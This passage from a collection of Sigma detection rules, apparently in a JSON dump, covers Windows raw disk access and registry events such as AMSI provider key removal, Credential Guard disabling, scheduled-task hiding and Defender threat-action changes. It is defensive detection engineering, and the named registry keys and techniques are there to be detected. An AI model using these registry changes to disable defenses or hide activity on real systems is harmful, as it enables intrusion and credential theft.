    "content": "title: Potential Defense Evasion Via Raw Disk Access By Uncommon Tools\nid: db809f10-56ce-4420-8c86-d6a7d793c79c\nstatus: test\ndescription: Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019-10-22\nmodified: 2025-12-03\ntags:\n    - attack.defense-evasion\n    - attack.t1006\nlogsource:\n    product: windows\n    category: raw_access_thread\ndetection:\n    filter_main_floppy:\n        Device|contains: floppy\n    filter_main_generic:\n        Image|startswith:\n            - 'C:\\$WINDOWS.~BT\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\CCM\\'\n            - 'C:\\Windows\\explorer.exe'\n            - 'C:\\Windows\\servicing\\'\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SystemApps\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\uus\\'\n            - 'C:\\Windows\\WinSxS\\'\n    filter_main_system_images:\n        Image:\n            - 'Registry'\n            - 'System'\n    filter_main_windefender:\n        Image|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        Image|endswith:\n            - '\\MsMpEng.exe'\n            - '\\MpDefenderCoreService.exe'\n    filter_main_microsoft_appdata:\n        Image|startswith: 'C:\\Users\\'\n        Image|contains|all:\n            - '\\AppData\\'\n            - '\\Microsoft\\'\n    filter_main_ssd_nvme:\n        Image|startswith: 'C:\\Windows\\Temp\\'\n        Image|endswith:\n            - '\\Executables\\SSDUpdate.exe'\n            - '\\HostMetadata\\NVMEHostmetadata.exe'\n    filter_main_null:\n        Image: null\n    filter_main_systemsettings:\n        Image: 'C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n    filter_main_update:\n        Image|startswith: 'C:\\$WinREAgent\\Scratch\\'\n    filter_optional_github_desktop:\n        Image|startswith: 'C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\GitHubDesktop\\app-'\n        Image|endswith: '\\resources\\app\\git\\mingw64\\bin\\git.exe'\n    filter_optional_nextron:\n        Image|startswith: 'C:\\Windows\\Temp\\asgard2-agent\\'\n        Image|endswith: '\\thor.exe'\n    filter_optional_Keybase:\n        Image|startswith: 'C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\Keybase\\upd.exe'\n    condition: not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml",
    "content": "title: Potential Persistence Via Disk Cleanup Handler - Registry\nid: d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a\nstatus: test\ndescription: |\n    Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\n    The disk cleanup manager is part of the operating system. It displays the dialog box […]\n    The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\n    Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\n    Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\n    Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\nreferences:\n    - https://persistence-info.github.io/Data/diskcleanuphandler.html\n    - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-02-07\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    category: registry_add\ndetection:\n    selection:\n        EventType: CreateKey\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches\\'\n    filter_main_default_keys:\n        # Default Keys\n        TargetObject|endswith:\n            - '\\Active Setup Temp Folders'\n            - '\\BranchCache'\n            - '\\Content Indexer Cleaner'\n            - '\\D3D Shader Cache'\n            - '\\Delivery Optimization Files'\n            - '\\Device Driver Packages'\n            - '\\Diagnostic Data Viewer database files'\n            - '\\Downloaded Program Files'\n            - '\\DownloadsFolder'\n            - '\\Feedback Hub Archive log files'\n            - '\\Internet Cache Files'\n            - '\\Language Pack'\n            - '\\Microsoft Office Temp Files'\n            - '\\Offline Pages Files'\n            - '\\Old ChkDsk Files'\n            - '\\Previous Installations'\n            - '\\Recycle Bin'\n            - '\\RetailDemo Offline Content'\n            - '\\Setup Log Files'\n            - '\\System error memory dump files'\n            - '\\System error minidump files'\n            - '\\Temporary Files'\n            - '\\Temporary Setup Files'\n            - '\\Temporary Sync Files'\n            - '\\Thumbnail Cache'\n            - '\\Update Cleanup'\n            - '\\Upgrade Discarded Files'\n            - '\\User file versions'\n            - '\\Windows Defender'\n            - '\\Windows Error Reporting Files'\n            - '\\Windows ESD installation files'\n            - '\\Windows Upgrade Log Files'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate new entry added by Windows\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_defender_context_menu.yml",
    "content": "title: Delete Defender Scan ShellEx Context Menu Registry Key\nid: 72a0369a-2576-4aaf-bfc9-6bb24a574ac6\nrelated:\n    - id: b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b\n      type: similar\nstatus: experimental\ndescription: Detects deletion of registry key that adds 'Scan with Defender' option in context menu. Attackers may use this to make it harder for users to scan files that are suspicious.\nreferences:\n    - https://research.splunk.com/endpoint/395ed5fe-ad13-4366-9405-a228427bdd91/\n    - https://winaero.com/how-to-delete-scan-with-windows-defender-from-context-menu-in-windows-10/\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\n    - https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat/\nauthor: 'Matt Anderson (Huntress)'\ndate: 2025-07-11\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: registry_delete\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'shellex\\ContextMenuHandlers\\EPP'\n    filter_main_defender:\n        Image|startswith:\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\Program Files (x86)\\Windows Defender\\'\n        Image|endswith: '\\MsMpEng.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely as this weakens defenses and normally would not be done even if using another AV.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_disable_credential_guard.yml",
    "content": "title: Windows Credential Guard Related Registry Value Deleted - Registry\nid: d645ef86-2396-48a1-a2b6-b629ca3f57ff\nrelated:\n    - id: c17d47b7-dcd6-4109-87eb-d1817bd4cbc9\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to disable Windows Credential Guard by deleting registry values. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can access them.\n    Adversaries may disable Credential Guard to gain access to sensitive credentials stored in the system, such as NTLM hashes and Kerberos tickets, which can be used for lateral movement and privilege escalation.\nreferences:\n    - https://github.com/DambergC/SaveFolder/blob/90e945eba80fae85f2d54b4616e05a44ec90c500/Cygate%20Installation%20tool%206.22/Script/OSD/OSDeployment-CredentialGuardDisable.ps1#L50\n    - https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/configure\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-12-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_delete\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '\\DeviceGuard\\EnableVirtualizationBasedSecurity'\n            - '\\DeviceGuard\\LsaCfgFlags'\n            - '\\DeviceGuard\\RequirePlatformSecurityFeatures'\n            - '\\Lsa\\LsaCfgFlags'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_delete/registry_delete_disable_credential_guard/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_enable_windows_recall.yml",
    "content": "title: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted\nid: 5dfc1465-8f65-4fde-8eb5-6194380c6a62\nrelated:\n    - id: 75180c5f-4ea1-461a-a4f6-6e4700c065d4\n      type: similar\n    - id: 817f252c-5143-4dae-b418-48c3e9f63728\n      type: similar\nstatus: test\ndescription: |\n    Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing \"DisableAIDataAnalysis\" registry value.\n    Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\n    This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/client-management/manage-recall\n    - https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis\nauthor: Sajid Nawaz Khan\ndate: 2024-06-02\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    category: registry_delete\n    product: windows\ndetection:\n    selection:\n        # HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis\n        # HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis\n        EventType: DeleteValue\n        TargetObject|endswith: '\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis'\n    condition: selection\nfalsepositives:\n    - Legitimate use/activation of Windows Recall\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml",
    "content": "title: Folder Removed From Exploit Guard ProtectedFolders List - Registry\nid: 272e55a4-9e6b-4211-acb6-78f51f0b1b40\nstatus: test\ndescription: Detects the removal of folders from the \"ProtectedFolders\" list of Exploit Guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder\nreferences:\n    - https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-05\nmodified: 2023-02-08\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_delete\n    product: windows\ndetection:\n    selection:\n        EventType: DeleteValue\n        TargetObject|contains: 'SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\ProtectedFolders'\n    condition: selection\nfalsepositives:\n    - Legitimate administrators removing applications (should always be investigated)\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml",
    "content": "title: Terminal Server Client Connection History Cleared - Registry\nid: 07bdd2f5-9c58-4f38-aec8-e101bb79ef8d\nstatus: test\ndescription: Detects the deletion of registry keys containing the MSTSC connection history\nreferences:\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer\n    - http://woshub.com/how-to-clear-rdp-connections-history/\n    - https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-10-19\nmodified: 2023-02-08\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1070\n    - attack.t1112\nlogsource:\n    category: registry_delete\n    product: windows\ndetection:\n    selection1:\n        EventType: DeleteValue\n        TargetObject|contains: '\\Microsoft\\Terminal Server Client\\Default\\MRU'\n    selection2:\n        EventType: DeleteKey\n        TargetObject|contains: '\\Microsoft\\Terminal Server Client\\Servers\\'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml",
    "content": "title: Removal Of AMSI Provider Registry Keys\nid: 41d1058a-aea7-4952-9293-29eaaf516465\nstatus: test\ndescription: Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://seclists.org/fulldisclosure/2020/Mar/45\nauthor: frack113\ndate: 2021-06-07\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_delete\ndetection:\n    selection:\n        TargetObject|endswith:\n            - '{2781761E-28E0-4109-99FE-B9D127C57AFE}' # IOfficeAntiVirus\n            - '{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' # ProtectionManagement.dll\n    filter_main_defender:\n        Image|startswith:\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\Program Files (x86)\\Windows Defender\\'\n        Image|endswith: '\\MsMpEng.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: AMSI Bypass - Remove AMSI Provider Reg Key\n      technique: T1562.001\n      atomic_guid: 13f09b91-c953-438e-845b-b585e51cac9b\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml",
    "content": "title: Removal of Potential COM Hijacking Registry Keys\nid: 96f697b0-b499-4e5d-9908-a67bec11cdb6\nstatus: test\ndescription: |\n    Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\n    These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/7\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md\n    - https://learn.microsoft.com/en-us/windows/win32/shell/launch\n    - https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand\n    - https://learn.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2025-10-07\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_delete\ndetection:\n    selection:\n        TargetObject|endswith: '\\shell\\open\\command'\n    filter_main_explorer:\n        Image|endswith: 'C:\\Windows\\explorer.exe'\n    filter_main_svchost:\n        Image: 'C:\\Windows\\system32\\svchost.exe'\n    filter_main_msiexec:\n        Image:\n            - 'C:\\Windows\\System32\\msiexec.exe'\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n    filter_main_generic_prorams:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    filter_main_openwith:\n        Image: 'C:\\Windows\\System32\\OpenWith.exe'\n    filter_optional_dropbox:\n        Image|endswith: '\\Dropbox.exe'\n        # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)\n        TargetObject|contains: '\\Dropbox.'\n    filter_optional_wireshark:\n        Image|endswith: '\\AppData\\Local\\Temp\\Wireshark_uninstaller.exe'\n        # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)\n        TargetObject|contains: '\\wireshark-capture-file\\'\n    filter_optional_peazip:\n        Image|contains: 'peazip'\n        # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)\n        TargetObject|contains: '\\PeaZip.'\n    filter_optional_everything:\n        Image|endswith: '\\Everything.exe'\n        # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)\n        TargetObject|contains: '\\Everything.'\n    filter_optional_uninstallers:\n        # This image path is linked with different uninstallers when running as admin unfortunately\n        Image|startswith: 'C:\\Windows\\Installer\\MSI'\n    filter_optional_java:\n        Image|startswith: 'C:\\Program Files (x86)\\Java\\'\n        Image|endswith: '\\installer.exe'\n        TargetObject|contains: '\\Classes\\WOW6432Node\\CLSID\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}'\n    filter_optional_edgeupdate:\n        Image|contains: '\\Microsoft\\EdgeUpdate\\Install'\n    filter_optional_avira:\n        Image:\n            - 'C:\\Program Files (x86)\\Avira\\Antivirus\\'\n            - 'C:\\Program Files\\Avira\\Antivirus\\'\n        TargetObject|endswith:\n            - '\\CLSID\\{305CA226-D286-468e-B848-2B2E8E697B74}\\Shell\\Open\\Command'\n            - '\\AntiVir.Keyfile\\shell\\open\\command'\n    filter_optional_installer_temp:\n        - Image|contains|all:\n              - 'AppData\\Local\\Temp'\n              - '\\setup.exe'\n        - Image|contains|all:\n              - '\\Temp\\is-'\n              - '\\target.tmp'\n    filter_optional_ninite:\n        Image|endswith: '\\ninite.exe'\n    filter_optional_discord:\n        Image|endswith: '\\reg.exe'\n        TargetObject|endswith: '\\Discord\\shell\\open\\command'\n    filter_optional_spotify:\n        Image|endswith: '\\Spotify.exe'\n        TargetObject|endswith: '\\Spotify\\shell\\open\\command'\n    filter_optional_eclipse:\n        Image|endswith: 'C:\\eclipse\\eclipse.exe'\n        TargetObject|contains: '_Classes\\eclipse+'\n    filter_optional_teamviewer:\n        Image|contains|all:\n            - '\\Temp'\n            - '\\TeamViewer'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software (un)installations are known to cause false positives. Please add them as a filter when encountered\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_runmru.yml",
    "content": "title: RunMRU Registry Key Deletion - Registry\nid: 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55\nrelated:\n    - id: c11aecef-9c37-45a6-9c07-bc0782f963fd\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog.\n    In the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.\n    Adversaries may delete this key to cover their tracks after executing commands.\nreferences:\n    - https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-25\ntags:\n    - attack.defense-evasion\n    - attack.t1070.003\nlogsource:\n    category: registry_delete\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_delete/registry_delete_runmru/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml",
    "content": "title: Removal Of Index Value to Hide Schedule Task - Registry\nid: 526cc8bc-1cdc-48ad-8b26-f19bff969cec\nrelated:\n    - id: acd74772-5f88-45c7-956b-6a7b36c294d2\n      type: similar\n    - id: 5b16df71-8615-4f7f-ac9b-6c43c0509e61\n      type: similar\nstatus: test\ndescription: Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"\nreferences:\n    - https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-26\nmodified: 2025-10-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: windows\n    category: registry_delete\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\'\n            - 'Index'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml",
    "content": "title: Removal Of SD Value to Hide Schedule Task - Registry\nid: acd74772-5f88-45c7-956b-6a7b36c294d2\nrelated:\n    - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec\n      type: similar\nstatus: test\ndescription: Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware\nreferences:\n    - https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/\nauthor: Sittikorn S\ndate: 2022-04-15\nmodified: 2025-10-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    product: windows\n    category: registry_delete\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\'\n            - 'SD'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml",
    "content": "title: Creation of a Local Hidden User Account by Registry\nid: 460479f3-80b7-42da-9c43-2cc1d54dbccd\nstatus: test\ndescription: Sysmon registry detection of a local hidden user account.\nreferences:\n    - https://twitter.com/SBousseaden/status/1387530414185664538\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-05-03\nmodified: 2025-10-31\ntags:\n    - attack.persistence\n    - attack.t1136.001\nlogsource:\n    product: windows\n    category: registry_event\ndetection:\n    selection:\n        TargetObject|contains: '\\SAM\\SAM\\Domains\\Account\\Users\\Names\\'\n        TargetObject|endswith: '$\\(Default)'\n        Image|endswith: '\\lsass.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_event/registry_event_add_local_hidden_user/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Create Hidden User in Registry\n      technique: T1564.002\n      atomic_guid: 173126b7-afe4-45eb-8680-fa9f6400431c\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml",
    "content": "title: UAC Bypass Via Wsreset\nid: 6ea3bf32-9680-422d-9f50-e90716b12a66\nstatus: test\ndescription: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly\n    - https://lolbas-project.github.io/lolbas/Binaries/Wsreset\nauthor: oscd.community, Dmitry Uchakin\ndate: 2020-10-07\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml",
    "content": "title: CMSTP Execution Registry Event\nid: b6d235fc-1d38-4b12-adbe-325f06728f37\nstatus: stable\ndescription: Detects various indicators of Microsoft Connection Manager Profile Installer execution\nreferences:\n    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/\nauthor: Nik Seetharaman\ndate: 2018-07-16\nmodified: 2020-12-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218.003\n    - attack.g0069\n    - car.2019-04-001\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\cmmgr32.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate CMSTP use (unlikely in modern enterprise environments)\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_defender_threat_action_modified.yml",
    "content": "title: Windows Defender Threat Severity Default Action Modified\nid: 5a9e1b2c-8f7d-4a1e-9b3c-0f6d7e5a4b1f\nrelated:\n    - id: 1e8a9b4d-3c2a-4f9b-8d1e-7c6a5b4f3d2e\n      type: similar\nstatus: experimental\ndescription: |\n    Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'.\n    This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level,\n    allowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference\n    - https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-threatseveritydefaultaction\n    - https://research.splunk.com/endpoint/7215831c-8252-4ae3-8d43-db588e82f952\n    - https://gist.github.com/Dump-GUY/8daef859f382b895ac6fd0cf094555d2\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\nauthor: 'Matt Anderson (Huntress)'\ndate: 2025-07-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows Defender\\Threats\\ThreatSeverityDefaultAction\\'\n        TargetObject|endswith:\n            - '\\1' # Low severity\n            - '\\2' # Moderate severity\n            - '\\4' # High severity\n            - '\\5' # Severe severity\n        Details:\n            - 'DWORD (0x00000006)' # Allow\n            - 'DWORD (0x00000009)' # NoAction\n    condition: selection\nfalsepositives:\n    - Legitimate administration via scripts or tools (e.g., SCCM, Intune, GPO enforcement). 
Correlate with administrative activity.\n    - Software installations that legitimately modify Defender settings (less common for these specific keys).\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml",
    "content": "title: Disable Security Events Logging Adding Reg Key MiniNt\nid: 919f2ef0-be2d-4a7a-b635-eb2b41fde044\nstatus: test\ndescription: Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stop writing events.\nreferences:\n    - https://twitter.com/0gtweet/status/1182516740955226112\n    - https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\nauthor: Ilyas Ochkov, oscd.community\ndate: 2019-10-25\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1562.002\n    - attack.t1112\n    - car.2022-03-001\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n    # Sysmon gives us HKLM\\SYSTEM\\CurrentControlSet\\.. if ControlSetXX is the selected one\n        - TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\MiniNt'\n          EventType: 'CreateKey'    # we don't want deletekey\n    # key rename\n        - NewName: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\MiniNt'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml",
    "content": "title: Wdigest CredGuard Registry Modification\nid: 1a2d6c47-75b0-45bd-b133-2c0be75349fd\nstatus: test\ndescription: |\n  Detects potential malicious modification of the property value of IsCredGuardEnabled from\n  HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\n  This is usually used with UseLogonCredential to manipulate the caching credentials.\nreferences:\n    - https://teamhydra.blog/2020/08/25/bypassing-credential-guard/\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2019-08-25\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\IsCredGuardEnabled'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml",
    "content": "title: Esentutl Volume Shadow Copy Service Keys\nid: 5aad0995-46ab-41bd-a9ff-724f41114971\nstatus: test\ndescription: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-20\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    category: registry_event\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'System\\CurrentControlSet\\Services\\VSS'\n        Image|endswith: 'esentutl.exe' # limit esentutl as in references, too many FP to filter\n    filter:\n        TargetObject|contains: 'System\\CurrentControlSet\\Services\\VSS\\Start'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml",
